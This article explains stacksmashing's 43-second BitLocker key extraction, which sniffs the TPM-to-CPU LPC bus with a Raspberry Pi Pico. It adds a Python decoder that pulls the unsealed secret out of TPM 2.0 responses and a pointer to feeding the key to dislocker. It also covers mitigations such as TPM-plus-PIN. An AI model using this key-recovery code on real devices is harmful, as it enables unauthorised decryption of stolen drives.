Microsoft’s BitLocker disk encryption, widely treated as a reliable safeguard for data at rest, has recently come under scrutiny for a weakness in its most common configuration. In a YouTube video, stacksmashing demonstrated that a Raspberry Pi Pico, a development board costing under $10, can sniff the key material BitLocker’s TPM hands to the CPU during boot and recover the encryption key, allowing the stored data to be decrypted in a mere 43 seconds.
The attack targets the Trusted Platform Module (TPM), the component BitLocker relies on in its default TPM-only configuration. In many desktops and business laptops the TPM is a discrete chip, separate from the CPU, that exchanges data with it over the Low Pin Count (LPC) bus. BitLocker seals its Volume Master Key (VMK) to the TPM’s Platform Configuration Registers (PCRs), which record measurements of the boot state; at boot the TPM unseals the VMK and hands it back to the CPU only if those measurements match the values the key was sealed against.
stacksmashing’s investigation turned on a simple fact: traffic between the TPM and the CPU on the LPC bus is not encrypted, so when the TPM unseals the VMK during boot, the key crosses the bus in plaintext. He targeted an old Lenovo laptop whose motherboard has an unused LPC connector next to the M.2 SSD slot. By pressing a Raspberry Pi Pico against the connector’s exposed metal pads, he could sample the LPC signals during the boot sequence. The Pico’s firmware decoded the raw bit stream into the bytes the TPM returned, from which the Volume Master Key was reconstructed. He then removed the encrypted drive and used dislocker, supplied with the recovered Volume Master Key, to decrypt it.
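The last step above, turning captured bus bytes into a key, comes down to decoding the TPM’s unseal response. The following is an added example written for this page; it is not stacksmashing’s sniffer firmware and not code from dislocker. It assumes TPM 2.0 response framing (the article does not say which TPM version the laptop had; a TPM 1.2 response is laid out differently), the function names are hypothetical, the response bytes are constructed from the TPM 2.0 specification’s layout rather than captured from hardware, and the 32-byte secret is a dummy value standing in for a VMK. It also shows the check a practitioner would want: whether the authorization session had parameter encryption enabled, which is the one case in which the bytes on the bus would be ciphertext.

```python
"""Added example: decode a TPM 2.0 response captured from the bus and pull
the unsealed secret out of it. Not stacksmashing's sniffer and not part of
dislocker. Framing follows the TPM 2.0 Library specification (Part 1,
response structure; Part 3, TPM2_Unseal). The bytes produced by
build_unseal_response() are CONSTRUCTED test data; the 32-byte secret is a
dummy value standing in for a VMK."""
import struct
from typing import Dict, Optional

TPM_ST_NO_SESSIONS = 0x8001   # response carries no authorization area
TPM_ST_SESSIONS = 0x8002      # response carries parameterSize + auth area
TPM_RC_SUCCESS = 0x00000000
TPMA_SESSION_ENCRYPT = 0x40   # session attribute: first response parameter is encrypted


def parse_tpm2_response(buf: bytes) -> Dict[str, object]:
    """Split a TPM 2.0 response into tag, response code, parameter bytes and auth area.

    Wire layout, all big-endian:
      tag(2) responseSize(4) responseCode(4)
      [parameterSize(4)]    only when tag == TPM_ST_SESSIONS
      parameters
      [authorization area]  only when tag == TPM_ST_SESSIONS
    A non-zero responseCode means no parameters or auth area follow.
    """
    if len(buf) < 10:
        raise ValueError("short TPM response header")
    tag, size, rc = struct.unpack(">HII", buf[:10])
    if size != len(buf):
        raise ValueError(f"responseSize {size} does not match {len(buf)} captured bytes")
    if tag not in (TPM_ST_NO_SESSIONS, TPM_ST_SESSIONS):
        raise ValueError(f"unexpected response tag 0x{tag:04x}")
    if rc != TPM_RC_SUCCESS:
        return {"tag": tag, "rc": rc, "params": b"", "auth": b""}
    if tag == TPM_ST_SESSIONS:
        (param_size,) = struct.unpack(">I", buf[10:14])
        params = buf[14:14 + param_size]
        auth = buf[14 + param_size:]
    else:
        params, auth = buf[10:], b""
    return {"tag": tag, "rc": rc, "params": params, "auth": auth}


def session_encrypts_params(auth: bytes) -> bool:
    """True if the (single) response session has TPMA_SESSION.encrypt set.

    Auth area of a response: nonceTPM (TPM2B) | sessionAttributes (1 byte) | hmac (TPM2B).
    """
    (nonce_len,) = struct.unpack(">H", auth[:2])
    attrs = auth[2 + nonce_len]
    return bool(attrs & TPMA_SESSION_ENCRYPT)


def recover_unsealed_secret(buf: bytes) -> Optional[bytes]:
    """Return the plaintext outData of a successful TPM2_Unseal response.

    Returns None when the session used parameter encryption: the bytes on the
    bus are then ciphertext and useless to a sniffer. A plaintext capture of
    the kind described in the article implies the session did not use it.
    """
    r = parse_tpm2_response(buf)
    if r["rc"] != TPM_RC_SUCCESS:
        raise ValueError(f"TPM2_Unseal failed, rc=0x{r['rc']:08x}")
    if r["auth"] and session_encrypts_params(r["auth"]):
        return None
    params = r["params"]
    (n,) = struct.unpack(">H", params[:2])   # outData is a TPM2B: size(2) + bytes
    secret = params[2:2 + n]
    if len(secret) != n:
        raise ValueError("truncated outData")
    return secret


def build_unseal_response(secret: bytes, encrypt: bool = False) -> bytes:
    """CONSTRUCTED test vector: a successful TPM2_Unseal response with one HMAC
    session (dummy nonce and HMAC). With encrypt=True only the session
    attribute is set; the secret is not actually encrypted, the flag is what
    the decoder inspects."""
    out_data = struct.pack(">H", len(secret)) + secret
    nonce_tpm = bytes(16)
    hmac = bytes(32)
    attrs = TPMA_SESSION_ENCRYPT if encrypt else 0x00
    auth = (struct.pack(">H", len(nonce_tpm)) + nonce_tpm
            + bytes([attrs])
            + struct.pack(">H", len(hmac)) + hmac)
    body = struct.pack(">I", len(out_data)) + out_data + auth
    return struct.pack(">HII", TPM_ST_SESSIONS, 10 + len(body), TPM_RC_SUCCESS) + body


if __name__ == "__main__":
    dummy_vmk = bytes(range(32))   # stand-in, not a real key
    captured = build_unseal_response(dummy_vmk)
    print("plaintext on bus:", recover_unsealed_secret(captured).hex())
    print("with parameter encryption:",
          recover_unsealed_secret(build_unseal_response(dummy_vmk, encrypt=True)))
```

The sniffer’s real job is the part this example skips: decoding LPC cycles into bytes. Once that is done, the response parser is all that stands between the capture and a usable key, and the recovered bytes can be written to a file and handed to dislocker, which accepts a raw VMK from a file (its `--vmk` option in current releases; check `dislocker --help` for the build in use). The exact wrapping BitLocker places around the VMK inside the sealed blob is not reproduced here.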
Microsoft acknowledges that such bus-sniffing attacks are possible, but contends that they require sophisticated tools and extended physical access to the targeted device. stacksmashing’s demonstration starkly contradicts that assessment: an attacker with the right knowledge and a Raspberry Pi Pico can pull the key in less than a minute. The attack does depend on the configuration, however. It works against a discrete TPM with the default TPM-only protector; Microsoft’s own countermeasures guidance recommends pre-boot authentication (a TPM-plus-PIN protector) for exactly this threat, since the TPM will not release the VMK without the PIN, and a firmware TPM inside the CPU exposes no bus to tap. The revelation nonetheless raises real concerns about the practical security of BitLocker as it is deployed by default and underscores the need for continued vigilance and improvements to fortify disk encryption against attacks that are cheap as well as sophisticated.